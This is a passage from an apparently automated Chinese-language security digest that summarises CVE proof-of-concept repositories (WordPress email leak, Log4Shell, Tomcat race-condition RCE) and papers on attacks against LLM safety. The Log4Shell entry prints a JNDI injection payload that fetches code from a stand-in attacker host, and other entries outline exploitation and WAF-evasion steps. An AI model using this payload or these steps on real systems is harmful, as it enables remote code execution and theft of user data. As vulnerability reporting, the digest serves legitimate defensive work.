| 2 | 新增多种LLM攻击方法相关论文,包括针对推理LLM的攻击 |
|
|||
|
|
| 3 | 涉及对LLM的安全机制的绕过和恶意行为诱导 |
|
|||
|
|
| 4 | 攻击方法包括减缓攻击、后门攻击、链式思考劫持和通用对抗触发器等 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> OverThink: 减缓推理LLM攻击,通过增加计算开销影响应用。
|
|||
|
|
|
|||
|
|
> BoT: 通过后门攻击破坏LLM的推理流程。
|
|||
|
|
|
|||
|
|
> H-CoT: 劫持链式思考机制,绕过LLM的安全措施。
|
|||
|
|
|
|||
|
|
> Cats Confuse Reasoning LLM: 针对推理模型的通用对抗触发器。
|
|||
|
|
|
|||
|
|
> 涉及的攻击技术和方法细节需要进一步研究具体的论文和代码实现。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• 大型语言模型 (LLMs)
|
|||
|
|
• LLM相关的应用程序
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库包含了LLM的最新攻击方法,为安全研究人员提供了重要的参考,有助于理解LLM的潜在安全风险,并为防御提供思路。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### paig - GenAI安全保护框架PAIG更新
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [paig](https://github.com/privacera/paig) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全修复` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **3**
|
|||
|
|
- 变更文件数: **6**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
PAIG (Privacy-preserving AI Guardrails) 是一个开源项目,旨在通过安全、合规和可观察性来保护生成式AI (GenAI) 应用。本次更新修复了AI应用关联在Guardrail保存时丢失的问题,并修改了CI流程。 由于更新内容涉及到Guardrail, 并且 Guardrails 可以被用于阻止不安全的或有害的 AI 行为,因此修复和完善 Guardrail 对于提升 AI 应用的安全性至关重要。更新还包括了CI流程的修复,这有助于保证项目的稳定性和安全性。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 修复了Guardrail保存时AI应用关联丢失的问题。 |
|
|||
|
|
| 2 | 更新了CI流程,提高了构建的稳定性。 |
|
|||
|
|
| 3 | Guardrail是PAIG框架的关键组件,用于增强AI应用的安全性。 |
|
|||
|
|
| 4 | 涉及组件包括paig-server, paig-common, paig-authorizer-core, paig-evaluation。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 修复了`paig-server/frontend/webapp/app/components/guardrail/forms/guardrail_form_util.js`中AI应用关联丢失的bug。
|
|||
|
|
|
|||
|
|
> 更新了`.github/workflows/paig-server-automation-ci.yml`文件,在构建和安装PAIG-Server依赖前,增加了构建并安装paig-common, paig-authorizer-core和paig-evaluation wheel的步骤,改进了CI流程。
|
|||
|
|
|
|||
|
|
> 更新了`paig-server/automation/cypress/e2e/guardrails/paig_guardrail_form_test.cy.js`文件, 增加了url的匹配检查
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• paig-server
|
|||
|
|
• paig-common
|
|||
|
|
• paig-authorizer-core
|
|||
|
|
• paig-evaluation
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
修复了AI应用关联丢失的问题,更新了CI流程,提升了Guardrail的可靠性,Guardrail是PAIG框架的核心组件,因此本次更新对于保障GenAI应用的安全性具有一定的价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2023-5561 - WordPress用户邮箱泄露
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2023-5561 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-04-01 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-04-01 07:24:40 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2023-5561-POC-Updated](https://github.com/rootxsushant/CVE-2023-5561-POC-Updated)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供CVE-2023-5561漏洞的POC,该漏洞允许未经授权的用户获取WordPress网站用户的邮箱地址。该POC通过发送特定的请求到WordPress的API接口,利用搜索功能来推断用户的邮箱信息。仓库中包含了更新后的POC,改进了原POC的并发请求问题,加入了10秒的延时,降低了被WAF拦截的风险。更新后的POC通过对用户名的后缀和前缀进行爆破,从而获取用户的邮箱信息。
|
|||
|
|
|
|||
|
|
更新内容分析:
|
|||
|
|
1. `poc.py` 文件是核心的POC实现,通过对WordPress的`/wp-json/wp/v2/users` API端点进行请求,结合搜索功能来获取用户邮箱信息。该文件增加了多线程并发处理,提高了爆破效率。并且通过对每个请求之间加入10秒的延时,降低了触发WAF的风险。
|
|||
|
|
2. `README.md` 文件详细说明了POC的使用方法和修改说明,更新了POC的执行命令,并解释了修改的原因和目的。
|
|||
|
|
|
|||
|
|
漏洞利用方式:
|
|||
|
|
1. POC通过构造带有特定搜索参数的HTTP请求,利用WordPress API的搜索功能。
|
|||
|
|
2. 通过对用户名后缀进行爆破,获取邮箱的后缀部分。
|
|||
|
|
3. 通过对用户名ID进行爆破,获取邮箱的ID部分。
|
|||
|
|
4. 最终拼接得到用户的完整邮箱地址。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | WordPress用户邮箱泄露漏洞 |
|
|||
|
|
| 2 | 利用WordPress API接口 |
|
|||
|
|
| 3 | 提供POC,可用于验证漏洞 |
|
|||
|
|
| 4 | POC修改,降低了被WAF拦截的风险 |
|
|||
|
|
| 5 | 存在邮箱信息泄露的风险 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:WordPress API的搜索功能存在缺陷,允许攻击者通过构造特定的请求来推断用户的邮箱地址。
|
|||
|
|
|
|||
|
|
> 利用方法:使用提供的POC,设置目标WordPress网站的URL,即可执行邮箱泄露攻击。
|
|||
|
|
|
|||
|
|
> 修复方案:在WordPress API中限制搜索功能,禁止未经授权的访问,或者增加邮箱的隐私保护机制。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• WordPress
|
|||
|
|
• WordPress插件
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞允许未经授权的用户获取WordPress网站用户的邮箱地址,可能导致敏感信息泄露。 提供了可用的POC,方便验证和利用。 影响范围广泛,WordPress是流行的CMS系统。POC提供了详细的利用方法。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2021-44228 - Tai-e分析Log4Shell漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2021-44228 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-04-01 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-04-01 06:53:49 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2021-44228](https://github.com/Tai-e/CVE-2021-44228)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是使用Tai-e静态分析工具识别Log4Shell (CVE-2021-44228) 漏洞的项目。仓库包含 Tai-e 框架的配置和示例代码,用于检测 Java 代码中的 Log4j 漏洞。初始提交创建了项目结构,包含 Gradle 和 Maven 的构建文件,以及示例代码。后续提交更新了 Tai-e 版本、嵌入了java-benchmarks、更新代码和修改了README文件。 CVE-2021-44228 是一个关键的远程代码执行 (RCE) 漏洞,攻击者可以通过构造恶意输入触发 Log4j 的 JNDI 查找,从而执行任意代码。 此仓库通过 Tai-e 工具的污点分析来检测潜在的漏洞点。利用方法:构造恶意的JNDI注入payload,如${jndi:ldap://badman.io/Exploit},将该payload传入logger.error()函数中,通过tai-e的分析可以检测到该漏洞。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 利用Tai-e静态分析Log4Shell漏洞 |
|
|||
|
|
| 2 | 涉及Log4j组件,影响广泛 |
|
|||
|
|
| 3 | 提供POC和漏洞利用代码 |
|
|||
|
|
| 4 | 漏洞可导致远程代码执行 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:Log4Shell漏洞是由于Log4j在处理日志消息时,允许JNDI查找,攻击者可以构造恶意输入触发远程代码执行。
|
|||
|
|
|
|||
|
|
> 利用方法:构造恶意的JNDI注入payload,例如:${jndi:ldap://badman.io/Exploit},并将其传入logger.error()函数。
|
|||
|
|
|
|||
|
|
> 修复方案:升级Log4j版本至安全版本,禁用JNDI查找,或者使用安全配置。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Log4j
|
|||
|
|
• Tai-e
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该项目针对广泛使用的Log4j组件的漏洞进行分析,提供了POC和利用代码,且漏洞影响严重,可导致RCE。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### Vul_Awareness - 漏洞感知模块:issue风险检测
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [Vul_Awareness](https://github.com/Open-source-community-SSC/Vul_Awareness) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **4**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个漏洞感知模块,旨在通过分析 GitHub issue 来检测潜在的安全风险。主要功能包括爬取 GitHub issue 数据,预处理数据,以及使用机器学习模型进行风险评估。本次更新主要增加了 `run_model_issue_binary.py` 文件,用于运行 issue 二分类模型,并完善了 `preprocess_issue_dataset.py` 文件,增加了对 title 和 body 的合并处理。同时,`model_main.py` 文件也被创建,用于调用模型进行 issue 风险评估。由于该仓库的功能和更新内容都与安全相关,因此具有一定的价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 爬取和预处理 GitHub issue 数据 |
|
|||
|
|
| 2 | 使用机器学习模型进行 issue 风险评估 |
|
|||
|
|
| 3 | 新增 `run_model_issue_binary.py` 用于运行issue风险检测模型 |
|
|||
|
|
| 4 | 完善 `preprocess_issue_dataset.py` 文件,合并 title 和 body |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用了 transformers 库加载 CodeBERT 和 BERT 模型。
|
|||
|
|
|
|||
|
|
> 使用 pandas 进行数据处理,预处理 issue 的 title 和 body 内容。
|
|||
|
|
|
|||
|
|
> `run_model_issue_binary.py` 文件定义了二分类的数据集和模型,用于预测 issue 是否存在安全风险。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• GitHub issue
|
|||
|
|
• 机器学习模型
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库通过机器学习模型分析 GitHub issue,检测潜在的安全风险,对安全分析具有一定价值,本次更新增加了模型执行的脚本和数据预处理,完善了功能。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### burp-idor - Burp Suite IDOR 检测工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [burp-idor](https://github.com/sammakumbe/burp-idor) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `GENERAL_UPDATE` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个Python工具,用于检测 Burp Suite 流量导出文件中存在的 Insecure Direct Object Reference (IDOR) 漏洞。工具结合了启发式分析、本地 AI 模型和动态测试来发现和验证潜在的 IDOR 问题。更新内容主要集中在README.md的修改,包括重新排版、更详细的功能描述和对现有功能的优化说明。由于该工具专注于IDOR漏洞检测,且使用了AI模型,所以具有一定的价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 基于 Burp Suite 流量的 IDOR 漏洞检测工具 |
|
|||
|
|
| 2 | 结合了启发式分析和本地 AI 模型 |
|
|||
|
|
| 3 | 采用动态测试验证漏洞 |
|
|||
|
|
| 4 | 减少误报,过滤已认证的请求 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用Python开发,用于分析 Burp Suite 的流量导出文件
|
|||
|
|
|
|||
|
|
> 启发式检测识别潜在的 IDOR 参数,如 id, user_id等
|
|||
|
|
|
|||
|
|
> 利用 Hugging Face 的 transformer 模型进行上下文相关的漏洞评分
|
|||
|
|
|
|||
|
|
> 通过发送测试请求来验证漏洞
|
|||
|
|
|
|||
|
|
> 通过检测会话头来过滤已认证的请求,减少误报。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Burp Suite
|
|||
|
|
• Python
|
|||
|
|
• Hugging Face transformer 模型
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该工具专门针对IDOR漏洞,结合了启发式分析和AI模型,能够自动化检测并验证IDOR漏洞,提高了安全测试的效率。更新内容虽然是README.md的修改,但由于其功能针对安全漏洞,故具有一定价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### dapr-security-ai-agent - AI驱动的安全Agent
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [dapr-security-ai-agent](https://github.com/dylandevus/dapr-security-ai-agent) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **4**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个基于Dapr工作流构建的AI安全Agent,主要功能是利用OpenAI生成YAML配置、SQL查询,用于安全监控和分析。更新内容包括:1. 优化代码,修改了`service.py`和`workflow.py`,改进了与OpenAI交互和工作流的逻辑。2. 增加了`/run`接口,允许用户通过查询字符串触发工作流。通过用户提供的自然语言提示,该Agent能够生成YAML配置,进而生成SQL查询,用于监控和告警。风险在于:如果生成的SQL查询存在缺陷,可能导致信息泄露或资源耗尽,如果用户输入恶意prompt,也可能影响安全。如果OpenAI生成的sql有误,也可能导致风险。整个系统依赖OpenAI的服务,如果OpenAI服务不可用,整个系统也将不可用。没有看到有针对安全方面的加固,所以风险较高。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 基于Dapr工作流的安全Agent |
|
|||
|
|
| 2 | 使用OpenAI生成YAML和SQL查询 |
|
|||
|
|
| 3 | 改进了`/run`接口,增强了用户交互 |
|
|||
|
|
| 4 | 依赖OpenAI服务,存在服务不可用风险 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用FastAPI创建REST API,接收用户查询
|
|||
|
|
|
|||
|
|
> 使用OpenAI API生成YAML配置文件和SQL查询语句
|
|||
|
|
|
|||
|
|
> Dapr工作流编排YAML生成、SQL生成等步骤
|
|||
|
|
|
|||
|
|
> 更新修改了generate_yaml和generate_sql函数,修改了prompt
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• src/service.py
|
|||
|
|
• src/workflow.py
|
|||
|
|
• OpenAI API
|
|||
|
|
• Dapr
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该项目结合了AI技术,实现了自动化安全监控与分析功能,可以根据用户提示生成YAML配置和SQL查询,提高了安全分析效率。但是,依赖OpenAI服务的可用性和生成的SQL质量,因此存在一定的风险。对于安全研究有参考价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### Zero - 开源邮件App,集成AI搜索
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [Zero](https://github.com/Mail-0/Zero) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **16**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个开源邮件应用程序,旨在提供注重隐私和安全的电子邮件体验。本次更新主要集中在多语言支持和用户界面增强,特别是引入了基于AI的搜索功能。更新内容包括:
|
|||
|
|
|
|||
|
|
1. 新增了对多国语言的支持,包括阿拉伯语、加泰罗尼亚语、捷克语、德语、西班牙语、法语、希伯来语、印地语、日语、韩语、拉脱维亚语、波兰语、葡萄牙语、俄语和土耳其语,这表明该项目正在积极拓展其国际用户群体。
|
|||
|
|
2. 在邮件应用的用户界面中增加了基于AI的搜索功能,具体体现在添加了“AI Suggestions”、“AI is searching...”、“AI search failed. Please try again.”、“AI No results”、“AI Enhanced query”等关键词,这表明邮件应用正在集成AI技术来增强搜索能力。
|
|||
|
|
|
|||
|
|
由于该仓库尚处于开发阶段,没有具体的安全漏洞信息。但是,集成AI搜索功能可能会引入新的安全风险,如:
|
|||
|
|
|
|||
|
|
* **数据隐私泄露**: AI搜索可能需要访问用户的邮件内容,如果处理不当,可能导致用户邮件内容泄露。
|
|||
|
|
* **搜索注入攻击**: 如果AI搜索的查询语句没有进行充分的过滤和验证,可能会导致搜索注入攻击,进而获取敏感信息或控制系统。
|
|||
|
|
|
|||
|
|
由于该项目没有提供有关安全防护的具体措施,因此存在一定的安全风险。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 邮件应用集成AI搜索功能 |
|
|||
|
|
| 2 | 新增多语言支持 |
|
|||
|
|
| 3 | AI搜索可能引入安全风险 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 新增了多语言本地化文件,用于支持多种语言的界面显示和用户交互。
|
|||
|
|
|
|||
|
|
> 在用户界面中增加了与AI搜索相关的提示信息,如“AI Suggestions”等,表明正在集成AI搜索。
|
|||
|
|
|
|||
|
|
> 技术细节还包括对依赖包的更新,例如package.json文件中openai和posthog-js依赖的更新。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• apps/mail
|
|||
|
|
• 用户界面前端
|
|||
|
|
• AI搜索后端(推测)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该更新引入了AI搜索功能,这在邮件应用中是一个有价值的功能增强。虽然当前版本没有直接的安全漏洞,但AI搜索功能引入了新的安全风险,值得关注。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2024-0012 - 批量检测脚本, 存在漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2024-0012 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-04-01 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-04-01 08:52:33 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2024-0012-poc](https://github.com/iSee857/CVE-2024-0012-poc)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个针对CVE-2024-0012的批量检测脚本。根据README.md的内容,该脚本能够批量检测URL是否存在漏洞。 README.md 提供了使用说明,包括批量检测和单个检测的命令示例。 通过分析提交历史,可以观察到README.md的持续更新,主要集中在添加博客地址和检测命令。从README.md中可以推断,该漏洞具有可利用性,有POC脚本,且提供了批量检测功能。 进一步分析POC代码能够确定漏洞的原理,利用方式,以及受影响的组件。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 存在可用的POC脚本 |
|
|||
|
|
| 2 | 提供了批量检测功能 |
|
|||
|
|
| 3 | README.md 包含使用说明 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞利用可能涉及远程代码执行或信息泄露,具体取决于CVE-2024-0012的详细信息。
|
|||
|
|
|
|||
|
|
> 利用方法:使用提供的python脚本,通过批量或单个URL检测。
|
|||
|
|
|
|||
|
|
> 修复方案:根据CVE描述,及时更新或修复受影响的组件,并对相关配置进行加固。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• 具体受影响的组件信息需要参考CVE-2024-0012的详细描述
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
由于提供了POC和批量检测脚本,且README.md给出了使用说明,表明漏洞具有较高的可利用性和实用性,因此判定为有价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2024-50379 - Tomcat条件竞争RCE漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2024-50379 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-04-01 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-04-01 08:51:28 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2024-50379-PoC](https://github.com/iSee857/CVE-2024-50379-PoC)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个针对Apache Tomcat CVE-2024-50379条件竞争漏洞的PoC脚本。仓库代码主要包含一个Python脚本,用于批量检测Tomcat服务器是否存在该漏洞。 PoC通过发送PUT请求上传JSP文件,然后发送GET请求尝试触发远程代码执行。 仓库更新主要集中在README文件的修改,添加了更多关于脚本使用的信息以及漏洞复现的链接。漏洞利用方式是:通过并发PUT请求上传恶意JSP文件,然后并发GET请求触发JSP文件执行,从而实现远程代码执行。该PoC提供了批量检测和单个URL检测的功能。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Apache Tomcat 存在条件竞争漏洞,可导致RCE |
|
|||
|
|
| 2 | PoC脚本已提供,具备批量检测和单个URL检测功能 |
|
|||
|
|
| 3 | 利用方式为并发上传JSP文件并触发执行 |
|
|||
|
|
| 4 | 漏洞危害高,可导致服务器被完全控制 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:Apache Tomcat由于存在并发处理机制的缺陷,导致在处理JSP文件时可能出现条件竞争,攻击者可利用该漏洞上传恶意的JSP文件并执行任意代码。
|
|||
|
|
|
|||
|
|
> 利用方法:PoC脚本通过PUT请求上传JSP文件(例如包含代码的/aa.Jsp),然后通过GET请求触发JSP文件执行。脚本使用多线程并发请求,提高成功率。
|
|||
|
|
|
|||
|
|
> 修复方案:升级到修复该漏洞的Tomcat版本。配置Tomcat以限制JSP文件的上传和执行权限。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Apache Tomcat
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞为RCE漏洞,存在公开可用的PoC,且PoC具有批量检测功能,危害严重。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2024-9047 - WordPress 文件上传插件任意文件读取
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2024-9047 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-04-01 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-04-01 08:51:03 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2024-9047-PoC](https://github.com/iSee857/CVE-2024-9047-PoC)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
